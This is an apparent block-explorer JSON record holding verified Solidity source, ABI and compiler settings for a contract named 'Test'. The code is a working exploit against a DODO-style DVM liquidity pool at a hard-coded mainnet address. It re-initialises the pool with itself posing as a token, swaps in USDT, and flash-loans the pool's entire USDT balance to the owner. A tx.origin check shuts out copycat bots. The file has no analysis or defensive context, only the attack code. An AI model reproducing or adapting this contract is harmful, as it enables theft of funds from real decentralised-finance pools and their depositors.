{"status":"1","message":"OK","result":[{"SourceCode":"//SPDX-License-Identifier: Unlicense\r\npragma solidity ^0.7.0;\r\n\r\ninterface Tether {\r\n    function transfer(address _to, uint _value) external;\r\n    function balanceOf(address who) external returns (uint);\r\n}\r\n\r\ninterface DVM {\r\n    function init(address maintainer,\r\n        address baseTokenAddress,\r\n        address quoteTokenAddress,\r\n        uint256 lpFeeRate,\r\n        address mtFeeRateModel,\r\n        uint256 i,\r\n        uint256 k,\r\n        bool isOpenTWAP\r\n    ) external;\r\n    function flashLoan(\r\n        uint256 baseAmount,\r\n        uint256 quoteAmount,\r\n        address assetTo,\r\n        bytes calldata data\r\n    ) external;\r\n    function sync() external;\r\n}\r\n\r\ncontract Test {\r\n    address private immutable owner;\r\n    uint256 public decimals;\r\n\r\n    constructor() payable {\r\n        owner = msg.sender;\r\n        decimals = 6;\r\n    }\r\n\r\n    function test() external {\r\n        require(tx.origin == owner);\r\n        address tether = 0xdAC17F958D2ee523a2206206994597C13D831ec7;\r\n        address dvm = 0x171f481fEa1042ed3Ee4470052e604FB4D91791A;\r\n\r\n        DVM(dvm).init(address(this), address(this), dvm, 0, address(this), 1, 0, false);\r\n        DVM(dvm).sync();\r\n        DVM(dvm).init(address(this), tether, dvm, 0, address(this), 1, 0, false);\r\n        DVM(dvm).flashLoan(Tether(tether).balanceOf(dvm), 0, owner, \"\");\r\n    }\r\n\r\n    function balanceOf(address /*who*/) external view returns (uint) {\r\n        require(tx.origin == owner, \"bad bot\");\r\n        return 0;\r\n    }\r\n}","ABI":"[{\"inputs\":[],\"stateMutability\":\"payable\",\"type\":\"constructor\"},{\"inputs\":[{\"internalType\":\"address\",\"name\":\"\",\"type\":\"address\"}],\"name\":\"balanceOf\",\"outputs\":[{\"internalType\":\"uint256\",\"name\":\"\",\"type\":\"uint256\"}],\"stateMutability\":\"view\",\"type\":\"function\"},{\"inputs\":[],\"name\":\"decimals\",\"outputs\":[{\"internalType\":\"uint256\",\"name\":\"\",\"type\":\"uint256\"}],\"stateMutability\":\"view\",\"type\":\"function\"},{\"inputs\":[],\"name\":\"test\",\"outputs\":[],\"stateMutability\":\"nonpayable\",\"type\":\"function\"}]","ContractName":"Test","CompilerVersion":"v0.7.3+commit.9bfce1f6","OptimizationUsed":"0","Runs":"200","ConstructorArguments":"","EVMVersion":"Default","Library":"","LicenseType":"Unlicense","Proxy":"0","Implementation":"","SwarmSource":"ipfs://cc15736681a6a2155925f9dd3221f979c2143a290c47c4fbb04e0c01cd50136c"}]}